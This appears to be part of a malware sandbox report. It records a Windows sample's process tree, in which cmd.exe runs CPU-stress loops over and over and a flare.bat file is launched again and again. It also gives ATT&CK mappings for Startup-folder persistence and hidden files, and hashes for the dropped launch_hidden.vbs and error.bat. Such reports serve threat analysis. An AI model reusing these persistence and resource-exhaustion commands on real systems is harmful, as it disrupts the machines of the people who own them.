        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        14⤵
        
        PID:2612
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        14⤵
        
        PID:4748
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:1468
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:2400
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:2792
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:3484
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:4916
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:3156
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:3360
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:2368
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:780
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:1660
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:5132
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:5144
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:5452
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:5464
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:6068
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:6096
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:5884
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:5480
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:6096
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:5804
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:5900
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:5716
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:5292
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:5820
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:6592
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:6600
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:7152
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:6188
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:6988
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:6324
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:7024
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:7064
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:6620
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:6408
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:7532
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:7560
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:8072
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:8080
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:7124
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:6424
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:6244
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:8184
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:7492
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:6752
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:4332
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:7528
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:7728
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:5216
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:8288
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:8304
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:8748
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:8756
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:9192
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:4920
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:8808
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:8604
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:4448
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        
        PID:4668
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        11⤵
        
        PID:9176
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:8356
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:2172
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:2672
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:1352
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:4000
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:5032
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:456
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:2644
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:3824
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:2820
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:4860
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:1084
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:428
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:3596
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:1320
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:2704
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:2012
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:5428
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:5436
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:5212
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:5228
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:5728
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:5736
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:5284
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:5260
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:5700
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:5828
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:6216
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:6236
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:6560
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:6568
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:6972
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:7048
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:6808
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:6568
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:6388
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:6368
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:7192
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:7216
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:8000
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:8064
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:7668
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:7456
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:7804
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:7816
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:7916
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:5128
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:6864
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:7776
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:7592
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:7572
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:2828
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:6512
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:2952
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:5316
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:8608
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:8624
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:8408
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:5372
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:8664
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:8476
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        8⤵
        
        PID:8268
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        
        PID:8624
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4388
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:1644
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2708
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:3112
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5088
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:2620
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1600
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:4104
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2248
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:2040
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2256
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:1600
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3856
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:2560
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1592
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:4860
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4212
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:5348
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5364
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:6016
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6032
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:5712
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5596
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:2012
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5316
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:5736
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6088
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:5640
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5268
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:6608
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6620
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:6328
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6356
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:6840
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6836
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:6996
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6992
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:6236
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6752
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:7328
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7336
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:8016
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:8028
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:7424
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7620
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:7392
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7512
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:6568
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6872
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:4316
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2836
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:6432
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5872
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:8044
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6440
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:8340
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:8376
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:5584
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5992
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:8512
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:8944
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:3844
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:9004
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        5⤵
        
        PID:9088
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:8948
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:4632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4404
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1320
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:1008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1592
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:4028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2508
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:3648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5064
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:4452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4956
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:1512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1312
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:2256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4920
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:4536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5164
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:5516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5536
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:5232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5260
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:5552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5992
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:5896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5084
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:5804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5288
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:5952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:6140
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:6488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:6528
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:7128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:6304
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:6476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:6420
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:6852
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:6588
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:6164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:7064
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:7568
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:7608
- C:\Windows\system32\cmd.exe
  cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
  2⤵
  PID:8140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:8172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:3808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:1820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:4404
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:5508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:5844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:6140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:6392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:7948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat
1⤵
PID:4232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs

Filesize
142B

MD5
a918e39e90540829b11e66ea68102b54

SHA1
b42ac88ad6a6d4fe99460a99b286748003a5326e

SHA256
007f1e45ce7381c2bdc57c7f4bce9be2d471dc9c76ebf520e0f7338359787435

SHA512
08165746cae6ee71f4a0e8a268cc1b88e26b5e1ffa266905d1005ffe361d61de6b116974e2c3bbd25b8bbbe86a418968192bf28bf6013883f049a1e678c2eeb1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error.bat

Filesize
237B

MD5
29871f22521d0ab5777e9dfc20fc9c55

SHA1
afe0417165c9011c338b416f4eaaddca0cf7fc52

